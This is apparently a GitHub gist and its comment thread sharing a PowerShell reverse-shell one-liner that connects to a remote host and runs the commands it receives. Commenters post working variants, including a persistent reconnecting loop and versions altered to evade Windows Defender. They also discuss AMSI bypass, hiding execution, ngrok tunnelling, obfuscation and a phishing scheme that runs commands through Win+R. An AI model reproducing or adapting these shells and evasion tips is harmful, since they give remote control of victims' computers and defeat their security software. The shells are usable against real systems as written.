powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok

powershell_reverse_shell.ps1

# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Ethical !, OK.

…

On Sat, Jul 25, 2020, 4:09 PM Vedant Bhalgama ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------ Yes! I am not using it for Non Ethical purposes bro! I am a Ethical Hacker and need this for pentensting purpose! — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <https://gist.github.com/c058744a4240af6515eb32b2d33fbed3#gistcomment-3391280>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AK6LSYPRQWJJL3VATZVMCLDR5LYSXANCNFSM4IKBLS6A> .

Script Is running now but it gives detection error
@egre55, What were you telling to replace? to evade defender? Can u do the changes in the code?

One way or the other this script can be a disaster this is the best way i run such script::::::::::::: make sure you add the powershell -nop -c followed:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attackerIP',attackerPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Which listener can be used for this? NetCat?

yep, or Powercat: https://github.com/besimorhino/powercat

It got detected as MaliciousContent, Anything else? Should I try Obfuscation?

After executing it in PowerShell with IP and port changed but it is showing....... "new object exception calling ctor with 2 argument s connection attempt failed " what to do because I am not a PowerShell expert.
I run the netcat server in the Virtualbox

windows 10 has powershell script disabled for security defence.

…

On Tue, Nov 10, 2020 at 7:02 AM XZE3N ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------ hey, i wonder if i could get any help. I started playing around with this and it works amazing on win 7 but when I try to run it on a win 10 machine i get this error. I'm not sure if you can get around this. I'm using windows defender on this machine. [image: Screenshot (116)] <https://user-images.githubusercontent.com/63551886/98640855-764d1700-2333-11eb-8add-b469513bba0f.png> — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <https://gist.github.com/c058744a4240af6515eb32b2d33fbed3#gistcomment-3522306>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AK6LSYLKJ5SKTG64UZ642QLSPDQRVANCNFSM4IKBLS6A> .

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

Hi, Kindly check my fork.

Just a small change to the way commands are run to ensure any non-stdout text is sent back. (except for confirmation prompts).

Without this, due to the way in which the output of a command run by Invoke-Expression is handled, stderr output never gets sent back even with '2>&1' specified in your current format.

Thanks,

[vry nice )

i tried to run it silently by -WindowsStyle Hidden -NoLog but it not working , how can i run it silently

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

This actually still works and doesn't trigger anything

Hi, can someone explain how this exactly works? Why is (pwd).Path triggers the antivirus. And is this reverse shell only available until a restart of the victim's pc? I didn't found any explanation online. Thanks in advance.

good job!
It detected AMSI. but I used amsi bypass script before this script running.so this script runs successfully!

Looks like the shell did not return stderr, is it possible to return stderr as well?

hey @mappl3, feel free to add this in your fork and i'll update it ;) . you can also append 2>&1 to the end of a command to get stderr

Got stderr working with this modification:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
And if you want to catch some errors:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);try { $sendback = (iex ". { $data } 2>&1" | Out-String ); } catch { $sendback = "$_`n"}; $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

that's the one-liner updated with your addition for stderr. thanks for your contribution @Veids!

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

This actually still works and doesn't trigger anything

How would I run this from a bat file and what book do you recommend to learn powershell scripting on this level

Thanks for all your works! I have a question , how can i use this ps1 whit ngrok? If i change ip and port doesnt work on nc -nlvp 4444 (port i forward whit ngrok )

Thanks for all your works! I have a question , how can i use this ps1 whit ngrok? If i change ip and port doesnt work on nc -nlvp 4444 (port i forward whit ngrok )

In order to connect via port 4444, port 4444 has to also be open on your target. Try a different port like 53

while($true){try{$c=New-Object System.Net.Sockets.TCPClient("your server",8880);$s=$c.GetStream();$nl=[Environment]::NewLine;$m=[System.Text.Encoding]::UTF8.GetBytes('asprsh'+$nl+'{"a":"a"}'+$nl);$s.Write($m,0,$m.Length);$s.Flush();[byte[]]$b=0..65535|%{0};while($true){if(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$ec=@("exit", "quit", "bye", "logout", "close");if($d -in $ec) {continue;} else { $g=(iex $d 2>&1 | Out-String );$w=$g+$nl+"PS "+(pwd).Path+"# ";$p=([text.encoding]::ASCII).GetBytes($w);$s.Write($p,0,$p.Length);$s.Flush()}};$c.Close();}catch{Start-Sleep -Seconds 2};};

Congrats bro, you made it into a CompTIA sponsored course on cybersecurity
https://i.imgur.com/eN7OCjl.png

I think I was pretty clear on attribution @jzburda

im having issues getting it to run

You can use reverseshell .com online website rhatbis very easy

…

On Fri, 9 May, 2025, 8:16 am chennaultj2, ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------ im having issues getting it to run Screenshot.2025-05-08.224559.png (view on web) <https://gist.github.com/user-attachments/assets/607cd0d4-ca24-45c8-a39c-275f2a5fa447> — Reply to this email directly, view it on GitHub <https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3#gistcomment-5572460> or unsubscribe <https://github.com/notifications/unsubscribe-auth/AQ44F6W6VTKADXERBOBYUN325QJJHBFKMF2HI4TJMJ2XIZLTSKBKK5TBNR2WLJDUOJ2WLJDOMFWWLO3UNBZGKYLEL5YGC4TUNFRWS4DBNZ2F6YLDORUXM2LUPGBKK5TBNR2WLJDHNFZXJJDOMFWWLK3UNBZGKYLEL52HS4DFVRZXKYTKMVRXIX3UPFYGLK2HNFZXIQ3PNVWWK3TUUZ2G64DJMNZZDAVEOR4XAZNEM5UXG5FFOZQWY5LFVA4DOMJQGUYTKMVHORZGSZ3HMVZKMY3SMVQXIZI> . You are receiving this email because you commented on the thread. Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub> .

i dont see that lol

I've been trying to realize a small phishing campaign and got an idea to use win+R to execute some prepared commands to phish targets (all in educational purposes for my bachelor's). I managed to successfully bypass ESET AV solution, but Defender seems to be stopping me from executing anything that is nearly suspicious from win+R. I've tried -E powershell tag, also tried obfuscating the command but found no success. Did anyone try to play with this?

You'll have to make changes to the existing reverse shell code, you can make use of multiple obfuscation techniques mentioned below, apply these to the above reverse shell code manually, it should do the job
https://github.com/t3l3machus/PowerShell-Obfuscation-Bible